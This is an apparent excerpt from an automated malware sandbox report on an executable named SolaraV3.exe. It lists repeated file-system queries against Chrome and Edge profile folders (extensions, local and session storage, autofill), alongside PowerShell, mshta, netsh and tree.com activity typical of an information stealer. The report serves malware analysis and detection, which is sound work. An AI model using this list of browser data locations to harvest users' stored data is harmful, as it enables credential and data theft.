Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ro VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\th VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\tr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\vi VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_CN VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\zh_TW VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FileTypePolicies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\tree.com	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
